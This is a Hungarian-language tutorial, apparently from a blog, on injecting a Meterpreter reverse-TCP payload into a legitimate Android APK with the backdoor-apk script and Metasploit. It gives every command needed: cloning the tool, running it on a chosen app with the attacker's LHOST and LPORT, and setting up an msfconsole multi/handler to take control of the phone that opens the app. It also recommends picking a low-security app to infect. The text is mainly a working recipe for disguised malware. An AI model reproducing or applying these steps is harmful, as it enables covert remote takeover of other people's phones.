Metasploit APK másolás

Sziasztok! Ma bemutatom hogyan lehet APK-t lemásolni egy payloaddal. Itt videó formában is megtudhatod, hogyan készíts egy fertőzött APK-t:

Kellékek:

Mindenek előtt kelleni fog egy Linux (Ajánlott a Kali Linux, de egy Ubuntu vagy bármilyen Debian is megteszi csak arra még le kell telepítened a következőket:

• sudo apt-get install git
• sudo apt-get install metasploit-framework

Ha nem szeretnél dualboot-os számítógépet van megoldás, használj VirtualBox-ot.

Na viszont kezdjünk bele. Először is nyiss egy terminált. Válaszd ki hova szeretnéd lementeni. Használd a választáshoz a cd avagy change dictionary parancsot.

Ha ezzel megvagy most le kell telepítened pár file-t a következő paranccsal:

• git clone https://github.com/dana-at-cp/backdoor-apk

Ha egy lakat ikont látsz rajta akkor azt a

• sudo chown -v felhasználónév file neve

paranccsal tudod leszedni.

Most használjuk a szükséges kódokat:

• apt-get update
• apt-get upgrade
• apt-get install -y default-jdk
• apt-get install apktool
• apt-get install zipalign
• apt-get install smali

Most menjünk a terminállal a backdoor-apk mappájába a következő paranccsal:

• cd backdoor-apk

Mégegyszer írjuk be ugyan ezt a kódot mivel a mappán belül van mégegy ilyen nevű mappa

• cd backdoor-apk

Most átkell szerkesztenünk a backdoor-apk.sh file-t a nano command használatával:

• nano backdoor-apk.sh

Keressük ki a ZIPALIGN=... sort és töröljük ki a felesleges sorokat. Legyen nálad is úgy mint a következő képen:

ctrl+o gombkombinációval mentsd el a file-t és ctrl+x-el tudsz kilépni a szerkesztésből.

Most töltsük le az APKTOOL-t.

Itt tudod letölteni. Több segítség a videóban.

Miután letöltötted az APKTOOL-t tölts le egy APK file-t (például: videólejátszó, egy szimpla offline játék, a lényeg, hogy ne egy nagyobb biztonságú appot tölts le mint az instagram vagy hasonló.)
Ezt az apk file-t másold vagy helyezd át a backdoor-apk belüli backdoor-apk mappába, ha nem engedi használd a következő parancsot:

• sudo chown -v felhasználónév mappa ami megtagadja az engedélyt

ha ezzel megvagy már nincs sok hátra :)
A következő lépés, hogy elindítsuk az APK másolást ezzel a paranccsal: (Ügyelj, hogy a backdoor-apk belüli backdoor-apk mappában van megnyitva a terminál!)

• ./backdoor-apk.sh alkalmazásnév.apk

Ha beírtad vagy bemásoltad a terminálba az előző kódsort ezt kell, hogy lásd:

Válaszd a meterpreter/reverse_tcp-t a 3-as szám beírásával, utánna írd be az IP címed az LHOST-hoz majd az LPORT-hoz a 8080-at.
utánna válaszd a merge with payload and shuffle-t a 2-es szám beírásával.
ha ez megvolt akkor elkedte készíteni a payload APK-t, ha készvan bezárhatod a terminált.

Most megkezdhetjük az APK-val a kapcsolatbalépést a metasploit framework segítségével

Nyiss egy új terminált és használd a következő parancsokat:

• sudo su
• msfconsole

Mostmár csak bekell állítani, hogy a te IP címedre hostoljon a payload APK. Hogyan is kell? Használd a következő parancsokat:

• use exploit/multi/handler
• set payload android/meterpreter/reverse_tcp
• set LHOST IP címed
• set LPORT 8080
• run

Vidd át a telefonodra az APK-t és nyisd meg, hogy a metasploit framework fel tudja venni a kapcsolatot a payloaddal és onnantól kezdve kezelheted a telefonodat a meterpreter-el.

Igazából ennyi is lett volna. Köszi, hogy elolvastad:) ha van bármi kérdés nyugodtan írj egy emailt: memdoboz@gmail.com